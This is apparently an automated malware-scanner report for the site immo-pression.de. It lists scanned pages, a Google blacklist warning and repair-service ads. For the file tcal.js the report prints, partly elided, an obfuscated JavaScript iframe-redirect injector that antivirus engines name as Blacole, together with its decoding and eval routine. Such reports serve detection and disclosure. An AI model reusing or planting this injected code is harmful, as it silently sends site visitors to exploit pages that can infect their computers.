New scan:

Malware Scanner report for immo-pression.de

Malicious/Suspicious/Total urls checked
1/0/18
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "immo-pression.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=immo-pression.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.immo-pression.de/
200 OK
Content-Length: 29486
Content-Type: text/html
clean
http://www.immo-pression.de/mainmenu/images.js
200 OK
Content-Length: 464
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/admin/ajax/tracking.js
200 OK
Content-Length: 2246
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/includes/portalconfig/jqueryui/js/jquery-1.7.1.min.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 18 Jan 2015 19:31:22 GMT
Location: http://www.immo-pression.de/403.php
Server: Apache/2.2.22
Content-Length: 296
Content-Type: text/html; charset=iso-8859-1
clean
http://www.immo-pression.de/403.php
403 Forbidden
Content-Length: 21393
Content-Type: text/html
clean
http://www.immo-pression.de/includes/portalconfig/jqueryui/js/jquery-ui-1.8.18.custom.min.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 18 Jan 2015 19:31:23 GMT
Location: http://www.immo-pression.de/403.php
Server: Apache/2.2.22
Content-Length: 296
Content-Type: text/html; charset=iso-8859-1
clean
http://www.immo-pression.de/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Sun, 18 Jan 2015 19:31:23 GMT
Location: http://www.immo-pression.de/404.php
Server: Apache/2.2.22
Content-Length: 296
Content-Type: text/html; charset=iso-8859-1
clean
http://www.immo-pression.de/404.php
404 Not Found
Content-Length: 22031
Content-Type: text/html
clean
http://www.immo-pression.de/javascripts/lade_popup_nonssl_de.js
200 OK
Content-Length: 2869
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/javascripts/lade_funktionen.js
200 OK
Content-Length: 2311
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/includes/portalconfig/kalenderedit/tcal.js
200 OK
Content-Length: 17121
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,161,176,174,155,161,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,161,176,174,155,161,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,151,166,171,160,172,176,154,153,154,171,65,153,154,66,153,127,170,122,173,151,152,115,65,167,157,167,56
... 3003 bytes are skipped ...
,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],8);}try{asd()}catch(q){yy=50-50;}try{yy/=2}catch(q){yy=1;}if(!yy)eval(String["fr"+"omCharCode"].apply(String,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.EB.3
McAfee-GW-Edition
JS/Blacole-Redirect.ae
TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Redurectir.BOZ!tr
McAfee
JS/Blacole-Redirect.ae
GData
Script.Obfuscated.IFrame.C

http://www.immo-pression.de/admin/ajax/ajax.js
200 OK
Content-Length: 5162
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/admin/ajax/ajax-dynamic-list.js
200 OK
Content-Length: 10044
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/admin/ajax/_geodaten.js
200 OK
Content-Length: 15464
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/admin/ajax/_suchenkriterien_stadtteile.js
200 OK
Content-Length: 2733
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/admin/ajax/_suchenkriterien.js
200 OK
Content-Length: 3657
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/js/ib.js
200 OK
Content-Length: 855
Content-Type: application/x-javascript
clean
http://www.immo-pression.de/js/overlib_mini.js
200 OK
Content-Length: 37522
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: immo-pression.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: immo-pression.de
Referer: http://www.google.com/search?q=immo-pression.de

Result:
The result is similar to the first query. There are no suspicious redirects found.